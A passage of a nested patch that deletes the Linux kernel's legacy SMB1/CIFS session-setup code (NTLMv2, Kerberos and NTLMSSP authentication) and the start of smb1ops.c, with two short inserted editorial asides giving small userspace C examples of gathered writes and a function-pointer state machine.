+-	 * a large buffer 17K allocation
+-	 */
+-	int buf0_type;
+-	struct kvec iov[3];
+-};
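
[Editorial aside, not part of the patch: the struct comment above explains why the SMB goes out in three pieces instead of one 17K staging buffer. A userspace analogue of that gathered send, using writev(); names are hypothetical.]

#include <stdio.h>
#include <sys/uio.h>
#include <unistd.h>

/* Fixed header, optional blob (possibly zero length), and trailing
 * strings leave the process in a single writev() with no copy into a
 * combined buffer. */
static ssize_t send_three_pieces(int fd,
				 const void *hdr, size_t hdr_len,
				 const void *blob, size_t blob_len,
				 const void *tail, size_t tail_len)
{
	struct iovec iov[3] = {
		{ .iov_base = (void *)hdr,  .iov_len = hdr_len  },
		{ .iov_base = (void *)blob, .iov_len = blob_len },
		{ .iov_base = (void *)tail, .iov_len = tail_len },
	};

	return writev(fd, iov, 3);
}

int main(void)
{
	return send_three_pieces(STDOUT_FILENO, "hdr ", 4, "", 0,
				 "tail\n", 5) < 0;
}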
+-
+-#ifdef CONFIG_CIFS_ALLOW_INSECURE_LEGACY
+-static int
+-sess_alloc_buffer(struct sess_data *sess_data, int wct)
+-{
+-	int rc;
+-	struct cifs_ses *ses = sess_data->ses;
+-	struct smb_hdr *smb_buf;
+-
+-	rc = small_smb_init_no_tc(SMB_COM_SESSION_SETUP_ANDX, wct, ses,
+-				  (void **)&smb_buf);
+-
+-	if (rc)
+-		return rc;
+-
+-	sess_data->iov[0].iov_base = (char *)smb_buf;
+-	sess_data->iov[0].iov_len = be32_to_cpu(smb_buf->smb_buf_length) + 4;
+-	/*
+-	 * This variable will be used to clear the buffer
+-	 * allocated above in case of any error in the calling function.
+-	 */
+-	sess_data->buf0_type = CIFS_SMALL_BUFFER;
+-
+-	/* 2000 big enough to fit max user, domain, NOS name etc. */
+-	sess_data->iov[2].iov_base = kmalloc(2000, GFP_KERNEL);
+-	if (!sess_data->iov[2].iov_base) {
+-		rc = -ENOMEM;
+-		goto out_free_smb_buf;
+-	}
+-
+-	return 0;
+-
+-out_free_smb_buf:
+-	cifs_small_buf_release(smb_buf);
+-	sess_data->iov[0].iov_base = NULL;
+-	sess_data->iov[0].iov_len = 0;
+-	sess_data->buf0_type = CIFS_NO_BUFFER;
+-	return rc;
+-}
+-
+-static void
+-sess_free_buffer(struct sess_data *sess_data)
+-{
+-	struct kvec *iov = sess_data->iov;
+-
+-	/*
+-	 * Zero the session data before freeing, as it might contain sensitive info (keys, etc).
+-	 * Note that iov[1] is already freed by caller.
+-	 */
+-	if (sess_data->buf0_type != CIFS_NO_BUFFER && iov[0].iov_base)
+-		memzero_explicit(iov[0].iov_base, iov[0].iov_len);
+-
+-	free_rsp_buf(sess_data->buf0_type, iov[0].iov_base);
+-	sess_data->buf0_type = CIFS_NO_BUFFER;
+-	kfree_sensitive(iov[2].iov_base);
+-}
+-
+-static int
+-sess_establish_session(struct sess_data *sess_data)
+-{
+-	struct cifs_ses *ses = sess_data->ses;
+-	struct TCP_Server_Info *server = sess_data->server;
+-
+-	cifs_server_lock(server);
+-	if (!server->session_estab) {
+-		if (server->sign) {
+-			server->session_key.response =
+-				kmemdup(ses->auth_key.response,
+-				ses->auth_key.len, GFP_KERNEL);
+-			if (!server->session_key.response) {
+-				cifs_server_unlock(server);
+-				return -ENOMEM;
+-			}
+-			server->session_key.len =
+-						ses->auth_key.len;
+-		}
+-		server->sequence_number = 0x2;
+-		server->session_estab = true;
+-	}
+-	cifs_server_unlock(server);
+-
+-	cifs_dbg(FYI, "CIFS session established successfully\n");
+-	return 0;
+-}
+-
+-static int
+-sess_sendreceive(struct sess_data *sess_data)
+-{
+-	int rc;
+-	struct smb_hdr *smb_buf = (struct smb_hdr *) sess_data->iov[0].iov_base;
+-	__u16 count;
+-	struct kvec rsp_iov = { NULL, 0 };
+-
+-	count = sess_data->iov[1].iov_len + sess_data->iov[2].iov_len;
+-	be32_add_cpu(&smb_buf->smb_buf_length, count);
+-	put_bcc(count, smb_buf);
+-
+-	rc = SendReceive2(sess_data->xid, sess_data->ses,
+-			  sess_data->iov, 3 /* num_iovecs */,
+-			  &sess_data->buf0_type,
+-			  CIFS_LOG_ERROR, &rsp_iov);
+-	cifs_small_buf_release(sess_data->iov[0].iov_base);
+-	memcpy(&sess_data->iov[0], &rsp_iov, sizeof(struct kvec));
+-
+-	return rc;
+-}
+-
+-static void
+-sess_auth_ntlmv2(struct sess_data *sess_data)
+-{
+-	int rc = 0;
+-	struct smb_hdr *smb_buf;
+-	SESSION_SETUP_ANDX *pSMB;
+-	char *bcc_ptr;
+-	struct cifs_ses *ses = sess_data->ses;
+-	struct TCP_Server_Info *server = sess_data->server;
+-	__u32 capabilities;
+-	__u16 bytes_remaining;
+-
+-	/* old style NTLM sessionsetup */
+-	/* wct = 13 */
+-	rc = sess_alloc_buffer(sess_data, 13);
+-	if (rc)
+-		goto out;
+-
+-	pSMB = (SESSION_SETUP_ANDX *)sess_data->iov[0].iov_base;
+-	bcc_ptr = sess_data->iov[2].iov_base;
+-	capabilities = cifs_ssetup_hdr(ses, server, pSMB);
+-
+-	pSMB->req_no_secext.Capabilities = cpu_to_le32(capabilities);
+-
+-	/* LM2 password would be here if we supported it */
+-	pSMB->req_no_secext.CaseInsensitivePasswordLength = 0;
+-
+-	if (ses->user_name != NULL) {
+-		/* calculate nlmv2 response and session key */
+-		rc = setup_ntlmv2_rsp(ses, sess_data->nls_cp);
+-		if (rc) {
+-			cifs_dbg(VFS, "Error %d during NTLMv2 authentication\n", rc);
+-			goto out;
+-		}
+-
+-		memcpy(bcc_ptr, ses->auth_key.response + CIFS_SESS_KEY_SIZE,
+-				ses->auth_key.len - CIFS_SESS_KEY_SIZE);
+-		bcc_ptr += ses->auth_key.len - CIFS_SESS_KEY_SIZE;
+-
+-		/* set case sensitive password length after tilen may get
+-		 * assigned, tilen is 0 otherwise.
+-		 */
+-		pSMB->req_no_secext.CaseSensitivePasswordLength =
+-			cpu_to_le16(ses->auth_key.len - CIFS_SESS_KEY_SIZE);
+-	} else {
+-		pSMB->req_no_secext.CaseSensitivePasswordLength = 0;
+-	}
+-
+-	if (ses->capabilities & CAP_UNICODE) {
+-		if (!IS_ALIGNED(sess_data->iov[0].iov_len, 2)) {
+-			*bcc_ptr = 0;
+-			bcc_ptr++;
+-		}
+-		unicode_ssetup_strings(&bcc_ptr, ses, sess_data->nls_cp);
+-	} else {
+-		ascii_ssetup_strings(&bcc_ptr, ses, sess_data->nls_cp);
+-	}
+-
+-
+-	sess_data->iov[2].iov_len = (long) bcc_ptr -
+-			(long) sess_data->iov[2].iov_base;
+-
+-	rc = sess_sendreceive(sess_data);
+-	if (rc)
+-		goto out;
+-
+-	pSMB = (SESSION_SETUP_ANDX *)sess_data->iov[0].iov_base;
+-	smb_buf = (struct smb_hdr *)sess_data->iov[0].iov_base;
+-
+-	if (smb_buf->WordCount != 3) {
+-		rc = -EIO;
+-		cifs_dbg(VFS, "bad word count %d\n", smb_buf->WordCount);
+-		goto out;
+-	}
+-
+-	if (le16_to_cpu(pSMB->resp.Action) & GUEST_LOGIN)
+-		cifs_dbg(FYI, "Guest login\n"); /* BB mark SesInfo struct? */
+-
+-	ses->Suid = smb_buf->Uid;   /* UID left in wire format (le) */
+-	cifs_dbg(FYI, "UID = %llu\n", ses->Suid);
+-
+-	bytes_remaining = get_bcc(smb_buf);
+-	bcc_ptr = pByteArea(smb_buf);
+-
+-	/* BB check if Unicode and decode strings */
+-	if (bytes_remaining == 0) {
+-		/* no string area to decode, do nothing */
+-	} else if (smb_buf->Flags2 & SMBFLG2_UNICODE) {
+-		/* unicode string area must be word-aligned */
+-		if (!IS_ALIGNED((unsigned long)bcc_ptr - (unsigned long)smb_buf, 2)) {
+-			++bcc_ptr;
+-			--bytes_remaining;
+-		}
+-		decode_unicode_ssetup(&bcc_ptr, bytes_remaining, ses,
+-				      sess_data->nls_cp);
+-	} else {
+-		decode_ascii_ssetup(&bcc_ptr, bytes_remaining, ses,
+-				    sess_data->nls_cp);
+-	}
+-
+-	rc = sess_establish_session(sess_data);
+-out:
+-	sess_data->result = rc;
+-	sess_data->func = NULL;
+-	sess_free_buffer(sess_data);
+-	kfree_sensitive(ses->auth_key.response);
+-	ses->auth_key.response = NULL;
+-}
+-
+-#ifdef CONFIG_CIFS_UPCALL
+-static void
+-sess_auth_kerberos(struct sess_data *sess_data)
+-{
+-	int rc = 0;
+-	struct smb_hdr *smb_buf;
+-	SESSION_SETUP_ANDX *pSMB;
+-	char *bcc_ptr;
+-	struct cifs_ses *ses = sess_data->ses;
+-	struct TCP_Server_Info *server = sess_data->server;
+-	__u32 capabilities;
+-	__u16 bytes_remaining;
+-	struct key *spnego_key = NULL;
+-	struct cifs_spnego_msg *msg;
+-	u16 blob_len;
+-
+-	/* extended security */
+-	/* wct = 12 */
+-	rc = sess_alloc_buffer(sess_data, 12);
+-	if (rc)
+-		goto out;
+-
+-	pSMB = (SESSION_SETUP_ANDX *)sess_data->iov[0].iov_base;
+-	bcc_ptr = sess_data->iov[2].iov_base;
+-	capabilities = cifs_ssetup_hdr(ses, server, pSMB);
+-
+-	spnego_key = cifs_get_spnego_key(ses, server);
+-	if (IS_ERR(spnego_key)) {
+-		rc = PTR_ERR(spnego_key);
+-		spnego_key = NULL;
+-		goto out;
+-	}
+-
+-	msg = spnego_key->payload.data[0];
+-	/*
+-	 * check version field to make sure that cifs.upcall is
+-	 * sending us a response in an expected form
+-	 */
+-	if (msg->version != CIFS_SPNEGO_UPCALL_VERSION) {
+-		cifs_dbg(VFS, "incorrect version of cifs.upcall (expected %d but got %d)\n",
+-			 CIFS_SPNEGO_UPCALL_VERSION, msg->version);
+-		rc = -EKEYREJECTED;
+-		goto out_put_spnego_key;
+-	}
+-
+-	kfree_sensitive(ses->auth_key.response);
+-	ses->auth_key.response = kmemdup(msg->data, msg->sesskey_len,
+-					 GFP_KERNEL);
+-	if (!ses->auth_key.response) {
+-		cifs_dbg(VFS, "Kerberos can't allocate (%u bytes) memory\n",
+-			 msg->sesskey_len);
+-		rc = -ENOMEM;
+-		goto out_put_spnego_key;
+-	}
+-	ses->auth_key.len = msg->sesskey_len;
+-
+-	pSMB->req.hdr.Flags2 |= SMBFLG2_EXT_SEC;
+-	capabilities |= CAP_EXTENDED_SECURITY;
+-	pSMB->req.Capabilities = cpu_to_le32(capabilities);
+-	sess_data->iov[1].iov_base = msg->data + msg->sesskey_len;
+-	sess_data->iov[1].iov_len = msg->secblob_len;
+-	pSMB->req.SecurityBlobLength = cpu_to_le16(sess_data->iov[1].iov_len);
+-
+-	if (ses->capabilities & CAP_UNICODE) {
+-		/* unicode strings must be word aligned */
+-		if (!IS_ALIGNED(sess_data->iov[0].iov_len + sess_data->iov[1].iov_len, 2)) {
+-			*bcc_ptr = 0;
+-			bcc_ptr++;
+-		}
+-		unicode_oslm_strings(&bcc_ptr, sess_data->nls_cp);
+-		unicode_domain_string(&bcc_ptr, ses, sess_data->nls_cp);
+-	} else {
+-		/* BB: is this right? */
+-		ascii_ssetup_strings(&bcc_ptr, ses, sess_data->nls_cp);
+-	}
+-
+-	sess_data->iov[2].iov_len = (long) bcc_ptr -
+-			(long) sess_data->iov[2].iov_base;
+-
+-	rc = sess_sendreceive(sess_data);
+-	if (rc)
+-		goto out_put_spnego_key;
+-
+-	pSMB = (SESSION_SETUP_ANDX *)sess_data->iov[0].iov_base;
+-	smb_buf = (struct smb_hdr *)sess_data->iov[0].iov_base;
+-
+-	if (smb_buf->WordCount != 4) {
+-		rc = -EIO;
+-		cifs_dbg(VFS, "bad word count %d\n", smb_buf->WordCount);
+-		goto out_put_spnego_key;
+-	}
+-
+-	if (le16_to_cpu(pSMB->resp.Action) & GUEST_LOGIN)
+-		cifs_dbg(FYI, "Guest login\n"); /* BB mark SesInfo struct? */
+-
+-	ses->Suid = smb_buf->Uid;   /* UID left in wire format (le) */
+-	cifs_dbg(FYI, "UID = %llu\n", ses->Suid);
+-
+-	bytes_remaining = get_bcc(smb_buf);
+-	bcc_ptr = pByteArea(smb_buf);
+-
+-	blob_len = le16_to_cpu(pSMB->resp.SecurityBlobLength);
+-	if (blob_len > bytes_remaining) {
+-		cifs_dbg(VFS, "bad security blob length %d\n",
+-				blob_len);
+-		rc = -EINVAL;
+-		goto out_put_spnego_key;
+-	}
+-	bcc_ptr += blob_len;
+-	bytes_remaining -= blob_len;
+-
+-	/* BB check if Unicode and decode strings */
+-	if (bytes_remaining == 0) {
+-		/* no string area to decode, do nothing */
+-	} else if (smb_buf->Flags2 & SMBFLG2_UNICODE) {
+-		/* unicode string area must be word-aligned */
+-		if (!IS_ALIGNED((unsigned long)bcc_ptr - (unsigned long)smb_buf, 2)) {
+-			++bcc_ptr;
+-			--bytes_remaining;
+-		}
+-		decode_unicode_ssetup(&bcc_ptr, bytes_remaining, ses,
+-				      sess_data->nls_cp);
+-	} else {
+-		decode_ascii_ssetup(&bcc_ptr, bytes_remaining, ses,
+-				    sess_data->nls_cp);
+-	}
+-
+-	rc = sess_establish_session(sess_data);
+-out_put_spnego_key:
+-	key_invalidate(spnego_key);
+-	key_put(spnego_key);
+-out:
+-	sess_data->result = rc;
+-	sess_data->func = NULL;
+-	sess_free_buffer(sess_data);
+-	kfree_sensitive(ses->auth_key.response);
+-	ses->auth_key.response = NULL;
+-}
+-
+-#endif /* ! CONFIG_CIFS_UPCALL */
+-
+-/*
+- * The required kvec buffers have to be allocated before calling this
+- * function.
+- */
+-static int
+-_sess_auth_rawntlmssp_assemble_req(struct sess_data *sess_data)
+-{
+-	SESSION_SETUP_ANDX *pSMB;
+-	struct cifs_ses *ses = sess_data->ses;
+-	struct TCP_Server_Info *server = sess_data->server;
+-	__u32 capabilities;
+-	char *bcc_ptr;
+-
+-	pSMB = (SESSION_SETUP_ANDX *)sess_data->iov[0].iov_base;
+-
+-	capabilities = cifs_ssetup_hdr(ses, server, pSMB);
+-	if ((pSMB->req.hdr.Flags2 & SMBFLG2_UNICODE) == 0) {
+-		cifs_dbg(VFS, "NTLMSSP requires Unicode support\n");
+-		return -ENOSYS;
+-	}
+-
+-	pSMB->req.hdr.Flags2 |= SMBFLG2_EXT_SEC;
+-	capabilities |= CAP_EXTENDED_SECURITY;
+-	pSMB->req.Capabilities |= cpu_to_le32(capabilities);
+-
+-	bcc_ptr = sess_data->iov[2].iov_base;
+-	/* unicode strings must be word aligned */
+-	if (!IS_ALIGNED(sess_data->iov[0].iov_len + sess_data->iov[1].iov_len, 2)) {
+-		*bcc_ptr = 0;
+-		bcc_ptr++;
+-	}
+-	unicode_oslm_strings(&bcc_ptr, sess_data->nls_cp);
+-
+-	sess_data->iov[2].iov_len = (long) bcc_ptr -
+-					(long) sess_data->iov[2].iov_base;
+-
+-	return 0;
+-}
+-
+-static void
+-sess_auth_rawntlmssp_authenticate(struct sess_data *sess_data);
+-
+-static void
+-sess_auth_rawntlmssp_negotiate(struct sess_data *sess_data)
+-{
+-	int rc;
+-	struct smb_hdr *smb_buf;
+-	SESSION_SETUP_ANDX *pSMB;
+-	struct cifs_ses *ses = sess_data->ses;
+-	struct TCP_Server_Info *server = sess_data->server;
+-	__u16 bytes_remaining;
+-	char *bcc_ptr;
+-	unsigned char *ntlmsspblob = NULL;
+-	u16 blob_len;
+-
+-	cifs_dbg(FYI, "rawntlmssp session setup negotiate phase\n");
+-
+-	/*
+-	 * if memory allocation is successful, caller of this function
+-	 * frees it.
+-	 */
+-	ses->ntlmssp = kmalloc(sizeof(struct ntlmssp_auth), GFP_KERNEL);
+-	if (!ses->ntlmssp) {
+-		rc = -ENOMEM;
+-		goto out;
+-	}
+-	ses->ntlmssp->sesskey_per_smbsess = false;
+-
+-	/* wct = 12 */
+-	rc = sess_alloc_buffer(sess_data, 12);
+-	if (rc)
+-		goto out;
+-
+-	pSMB = (SESSION_SETUP_ANDX *)sess_data->iov[0].iov_base;
+-
+-	/* Build security blob before we assemble the request */
+-	rc = build_ntlmssp_negotiate_blob(&ntlmsspblob,
+-				     &blob_len, ses, server,
+-				     sess_data->nls_cp);
+-	if (rc)
+-		goto out_free_ntlmsspblob;
+-
+-	sess_data->iov[1].iov_len = blob_len;
+-	sess_data->iov[1].iov_base = ntlmsspblob;
+-	pSMB->req.SecurityBlobLength = cpu_to_le16(blob_len);
+-
+-	rc = _sess_auth_rawntlmssp_assemble_req(sess_data);
+-	if (rc)
+-		goto out_free_ntlmsspblob;
+-
+-	rc = sess_sendreceive(sess_data);
+-
+-	pSMB = (SESSION_SETUP_ANDX *)sess_data->iov[0].iov_base;
+-	smb_buf = (struct smb_hdr *)sess_data->iov[0].iov_base;
+-
+-	/* If true, rc here is expected and not an error */
+-	if (sess_data->buf0_type != CIFS_NO_BUFFER &&
+-	    smb_buf->Status.CifsError ==
+-			cpu_to_le32(NT_STATUS_MORE_PROCESSING_REQUIRED))
+-		rc = 0;
+-
+-	if (rc)
+-		goto out_free_ntlmsspblob;
+-
+-	cifs_dbg(FYI, "rawntlmssp session setup challenge phase\n");
+-
+-	if (smb_buf->WordCount != 4) {
+-		rc = -EIO;
+-		cifs_dbg(VFS, "bad word count %d\n", smb_buf->WordCount);
+-		goto out_free_ntlmsspblob;
+-	}
+-
+-	ses->Suid = smb_buf->Uid;   /* UID left in wire format (le) */
+-	cifs_dbg(FYI, "UID = %llu\n", ses->Suid);
+-
+-	bytes_remaining = get_bcc(smb_buf);
+-	bcc_ptr = pByteArea(smb_buf);
+-
+-	blob_len = le16_to_cpu(pSMB->resp.SecurityBlobLength);
+-	if (blob_len > bytes_remaining) {
+-		cifs_dbg(VFS, "bad security blob length %d\n",
+-				blob_len);
+-		rc = -EINVAL;
+-		goto out_free_ntlmsspblob;
+-	}
+-
+-	rc = decode_ntlmssp_challenge(bcc_ptr, blob_len, ses);
+-
+-out_free_ntlmsspblob:
+-	kfree_sensitive(ntlmsspblob);
+-out:
+-	sess_free_buffer(sess_data);
+-
+-	if (!rc) {
+-		sess_data->func = sess_auth_rawntlmssp_authenticate;
+-		return;
+-	}
+-
+-	/* Else error. Cleanup */
+-	kfree_sensitive(ses->auth_key.response);
+-	ses->auth_key.response = NULL;
+-	kfree_sensitive(ses->ntlmssp);
+-	ses->ntlmssp = NULL;
+-
+-	sess_data->func = NULL;
+-	sess_data->result = rc;
+-}
+-
+-static void
+-sess_auth_rawntlmssp_authenticate(struct sess_data *sess_data)
+-{
+-	int rc;
+-	struct smb_hdr *smb_buf;
+-	SESSION_SETUP_ANDX *pSMB;
+-	struct cifs_ses *ses = sess_data->ses;
+-	struct TCP_Server_Info *server = sess_data->server;
+-	__u16 bytes_remaining;
+-	char *bcc_ptr;
+-	unsigned char *ntlmsspblob = NULL;
+-	u16 blob_len;
+-
+-	cifs_dbg(FYI, "rawntlmssp session setup authenticate phase\n");
+-
+-	/* wct = 12 */
+-	rc = sess_alloc_buffer(sess_data, 12);
+-	if (rc)
+-		goto out;
+-
+-	/* Build security blob before we assemble the request */
+-	pSMB = (SESSION_SETUP_ANDX *)sess_data->iov[0].iov_base;
+-	smb_buf = (struct smb_hdr *)pSMB;
+-	rc = build_ntlmssp_auth_blob(&ntlmsspblob,
+-					&blob_len, ses, server,
+-					sess_data->nls_cp);
+-	if (rc)
+-		goto out_free_ntlmsspblob;
+-	sess_data->iov[1].iov_len = blob_len;
+-	sess_data->iov[1].iov_base = ntlmsspblob;
+-	pSMB->req.SecurityBlobLength = cpu_to_le16(blob_len);
+-	/*
+-	 * Make sure that we tell the server that we are using
+-	 * the uid that it just gave us back on the response
+-	 * (challenge)
+-	 */
+-	smb_buf->Uid = ses->Suid;
+-
+-	rc = _sess_auth_rawntlmssp_assemble_req(sess_data);
+-	if (rc)
+-		goto out_free_ntlmsspblob;
+-
+-	rc = sess_sendreceive(sess_data);
+-	if (rc)
+-		goto out_free_ntlmsspblob;
+-
+-	pSMB = (SESSION_SETUP_ANDX *)sess_data->iov[0].iov_base;
+-	smb_buf = (struct smb_hdr *)sess_data->iov[0].iov_base;
+-	if (smb_buf->WordCount != 4) {
+-		rc = -EIO;
+-		cifs_dbg(VFS, "bad word count %d\n", smb_buf->WordCount);
+-		goto out_free_ntlmsspblob;
+-	}
+-
+-	if (le16_to_cpu(pSMB->resp.Action) & GUEST_LOGIN)
+-		cifs_dbg(FYI, "Guest login\n"); /* BB mark SesInfo struct? */
+-
+-	if (ses->Suid != smb_buf->Uid) {
+-		ses->Suid = smb_buf->Uid;
+-		cifs_dbg(FYI, "UID changed! new UID = %llu\n", ses->Suid);
+-	}
+-
+-	bytes_remaining = get_bcc(smb_buf);
+-	bcc_ptr = pByteArea(smb_buf);
+-	blob_len = le16_to_cpu(pSMB->resp.SecurityBlobLength);
+-	if (blob_len > bytes_remaining) {
+-		cifs_dbg(VFS, "bad security blob length %d\n",
+-				blob_len);
+-		rc = -EINVAL;
+-		goto out_free_ntlmsspblob;
+-	}
+-	bcc_ptr += blob_len;
+-	bytes_remaining -= blob_len;
+-
+-
+-	/* BB check if Unicode and decode strings */
+-	if (bytes_remaining == 0) {
+-		/* no string area to decode, do nothing */
+-	} else if (smb_buf->Flags2 & SMBFLG2_UNICODE) {
+-		/* unicode string area must be word-aligned */
+-		if (!IS_ALIGNED((unsigned long)bcc_ptr - (unsigned long)smb_buf, 2)) {
+-			++bcc_ptr;
+-			--bytes_remaining;
+-		}
+-		decode_unicode_ssetup(&bcc_ptr, bytes_remaining, ses,
+-				      sess_data->nls_cp);
+-	} else {
+-		decode_ascii_ssetup(&bcc_ptr, bytes_remaining, ses,
+-				    sess_data->nls_cp);
+-	}
+-
+-out_free_ntlmsspblob:
+-	kfree_sensitive(ntlmsspblob);
+-out:
+-	sess_free_buffer(sess_data);
+-
+-	if (!rc)
+-		rc = sess_establish_session(sess_data);
+-
+-	/* Cleanup */
+-	kfree_sensitive(ses->auth_key.response);
+-	ses->auth_key.response = NULL;
+-	kfree_sensitive(ses->ntlmssp);
+-	ses->ntlmssp = NULL;
+-
+-	sess_data->func = NULL;
+-	sess_data->result = rc;
+-}
+-
+-static int select_sec(struct sess_data *sess_data)
+-{
+-	int type;
+-	struct cifs_ses *ses = sess_data->ses;
+-	struct TCP_Server_Info *server = sess_data->server;
+-
+-	type = cifs_select_sectype(server, ses->sectype);
+-	cifs_dbg(FYI, "sess setup type %d\n", type);
+-	if (type == Unspecified) {
+-		cifs_dbg(VFS, "Unable to select appropriate authentication method!\n");
+-		return -EINVAL;
+-	}
+-
+-	switch (type) {
+-	case NTLMv2:
+-		sess_data->func = sess_auth_ntlmv2;
+-		break;
+-	case Kerberos:
+-#ifdef CONFIG_CIFS_UPCALL
+-		sess_data->func = sess_auth_kerberos;
+-		break;
+-#else
+-		cifs_dbg(VFS, "Kerberos negotiated but upcall support disabled!\n");
+-		return -ENOSYS;
+-#endif /* CONFIG_CIFS_UPCALL */
+-	case RawNTLMSSP:
+-		sess_data->func = sess_auth_rawntlmssp_negotiate;
+-		break;
+-	default:
+-		cifs_dbg(VFS, "secType %d not supported!\n", type);
+-		return -ENOSYS;
+-	}
+-
+-	return 0;
+-}
+-
+-int CIFS_SessSetup(const unsigned int xid, struct cifs_ses *ses,
+-		   struct TCP_Server_Info *server,
+-		   const struct nls_table *nls_cp)
+-{
+-	int rc = 0;
+-	struct sess_data *sess_data;
+-
+-	if (ses == NULL) {
+-		WARN(1, "%s: ses == NULL!", __func__);
+-		return -EINVAL;
+-	}
+-
+-	sess_data = kzalloc(sizeof(struct sess_data), GFP_KERNEL);
+-	if (!sess_data)
+-		return -ENOMEM;
+-
+-	sess_data->xid = xid;
+-	sess_data->ses = ses;
+-	sess_data->server = server;
+-	sess_data->buf0_type = CIFS_NO_BUFFER;
+-	sess_data->nls_cp = (struct nls_table *) nls_cp;
+-
+-	rc = select_sec(sess_data);
+-	if (rc)
+-		goto out;
+-
+-	while (sess_data->func)
+-		sess_data->func(sess_data);
+-
+-	/* Store result before we free sess_data */
+-	rc = sess_data->result;
+-
+-out:
+-	kfree_sensitive(sess_data);
+-	return rc;
+-}
+-#endif /* CONFIG_CIFS_ALLOW_INSECURE_LEGACY */
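
[Editorial aside, not part of the patch: the dispatch loop in CIFS_SessSetup() above -- while (sess_data->func) sess_data->func(sess_data); -- is a small function-pointer state machine in which each phase either installs the next phase or clears the pointer to stop. A toy, self-contained version of the same shape.]

#include <stdio.h>

struct sm {
	void (*func)(struct sm *);
	int result;
};

static void phase_done(struct sm *s)
{
	puts("authenticate");
	s->result = 0;
	s->func = NULL;       /* terminates the driver loop */
}

static void phase_start(struct sm *s)
{
	puts("negotiate");
	s->func = phase_done; /* chain to the next phase */
}

int main(void)
{
	struct sm s = { .func = phase_start, .result = -1 };

	while (s.func)
		s.func(&s);
	return s.result;
}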
+diff --git a/fs/cifs/smb1ops.c b/fs/cifs/smb1ops.c
+deleted file mode 100644
+index 7d1b3fc014d94..0000000000000
+--- a/fs/cifs/smb1ops.c
++++ /dev/null
+@@ -1,1276 +0,0 @@
+-// SPDX-License-Identifier: GPL-2.0-only
+-/*
+- *  SMB1 (CIFS) version specific operations
+- *
+- *  Copyright (c) 2012, Jeff Layton <jlayton@redhat.com>
+- */
+-
+-#include <linux/pagemap.h>
+-#include <linux/vfs.h>
+-#include <uapi/linux/magic.h>
+-#include "cifsglob.h"
+-#include "cifsproto.h"
+-#include "cifs_debug.h"
+-#include "cifspdu.h"
+-#include "cifs_unicode.h"
+-#include "fs_context.h"
+-
+-/*
+- * An NT cancel request header looks just like the original request except:
+- *
+- * The Command is SMB_COM_NT_CANCEL
+- * The WordCount is zeroed out
+- * The ByteCount is zeroed out
+- *
+- * This function mangles an existing request buffer into a
+- * SMB_COM_NT_CANCEL request and then sends it.
+- */
+-static int
+-send_nt_cancel(struct TCP_Server_Info *server, struct smb_rqst *rqst,
+-	       struct mid_q_entry *mid)
+-{
+-	int rc = 0;
+-	struct smb_hdr *in_buf = (struct smb_hdr *)rqst->rq_iov[0].iov_base;
+-
+-	/* -4 for RFC1001 length and +2 for BCC field */
+-	in_buf->smb_buf_length = cpu_to_be32(sizeof(struct smb_hdr) - 4  + 2);
+-	in_buf->Command = SMB_COM_NT_CANCEL;
+-	in_buf->WordCount = 0;
+-	put_bcc(0, in_buf);
+-
+-	cifs_server_lock(server);
+-	rc = cifs_sign_smb(in_buf, server, &mid->sequence_number);
+-	if (rc) {
+-		cifs_server_unlock(server);
+-		return rc;
+-	}
+-
+-	/*
+-	 * The response to this call was already factored into the sequence
+-	 * number when the call went out, so we must adjust it back downward
+-	 * after signing here.
+-	 */
+-	--server->sequence_number;
+-	rc = smb_send(server, in_buf, be32_to_cpu(in_buf->smb_buf_length));
+-	if (rc < 0)
+-		server->sequence_number--;
+-
+-	cifs_server_unlock(server);
+-
+-	cifs_dbg(FYI, "issued NT_CANCEL for mid %u, rc = %d\n",
+-		 get_mid(in_buf), rc);
+-
+-	return rc;
+-}
+-
+-static bool
+-cifs_compare_fids(struct cifsFileInfo *ob1, struct cifsFileInfo *ob2)
+-{
+-	return ob1->fid.netfid == ob2->fid.netfid;
+-}
+-
+-static unsigned int
+-cifs_read_data_offset(char *buf)
+-{
+-	READ_RSP *rsp = (READ_RSP *)buf;
+-	return le16_to_cpu(rsp->DataOffset);
+-}
+-
+-static unsigned int
+-cifs_read_data_length(char *buf, bool in_remaining)
+-{
+-	READ_RSP *rsp = (READ_RSP *)buf;
+-	/* It's a bug reading remaining data for SMB1 packets */
+-	WARN_ON(in_remaining);
+-	return (le16_to_cpu(rsp->DataLengthHigh) << 16) +
+-	       le16_to_cpu(rsp->DataLength);
+-}
+-
+-static struct mid_q_entry *
+-cifs_find_mid(struct TCP_Server_Info *server, char *buffer)
+-{
+-	struct smb_hdr *buf = (struct smb_hdr *)buffer;
+-	struct mid_q_entry *mid;
+-
+-	spin_lock(&server->mid_lock);
+-	list_for_each_entry(mid, &server->pending_mid_q, qhead) {
+-		if (compare_mid(mid->mid, buf) &&
+-		    mid->mid_state == MID_REQUEST_SUBMITTED &&
+-		    le16_to_cpu(mid->command) == buf->Command) {
+-			kref_get(&mid->refcount);
+-			spin_unlock(&server->mid_lock);
+-			return mid;
+-		}
+-	}
+-	spin_unlock(&server->mid_lock);
+-	return NULL;
+-}
+-
+-static void
+-cifs_add_credits(struct TCP_Server_Info *server,
+-		 const struct cifs_credits *credits, const int optype)
+-{
+-	spin_lock(&server->req_lock);
+-	server->credits += credits->value;
+-	server->in_flight--;
+-	spin_unlock(&server->req_lock);
+-	wake_up(&server->request_q);
+-}
+-
+-static void
+-cifs_set_credits(struct TCP_Server_Info *server, const int val)
+-{
+-	spin_lock(&server->req_lock);
+-	server->credits = val;
+-	server->oplocks = val > 1 ? enable_oplocks : false;
+-	spin_unlock(&server->req_lock);
+-}
+-
+-static int *
+-cifs_get_credits_field(struct TCP_Server_Info *server, const int optype)
+-{
+-	return &server->credits;
+-}
+-
+-static unsigned int
+-cifs_get_credits(struct mid_q_entry *mid)
+-{
+-	return 1;
+-}
+-
+-/*
+- * Find a free multiplex id (SMB mid). Otherwise there could be
+- * mid collisions which might cause problems, demultiplexing the
+- * wrong response to this request. Multiplex ids could collide if
+- * one of a series requests takes much longer than the others, or
+- * if a very large number of long lived requests (byte range
+- * locks or FindNotify requests) are pending. No more than
+- * 64K-1 requests can be outstanding at one time. If no
+- * mids are available, return zero. A future optimization
+- * could make the combination of mids and uid the key we use
+- * to demultiplex on (rather than mid alone).
+- * In addition to the above check, the cifs demultiplex
+- * code already used the command code as a secondary
+- * check of the frame and if signing is negotiated the
+- * response would be discarded if the mid were the same
+- * but the signature was wrong. Since the mid is not put in the
+- * pending queue until later (when it is about to be dispatched)
+- * we do have to limit the number of outstanding requests
+- * to somewhat less than 64K-1 although it is hard to imagine
+- * so many threads being in the vfs at one time.
+- */
+-static __u64
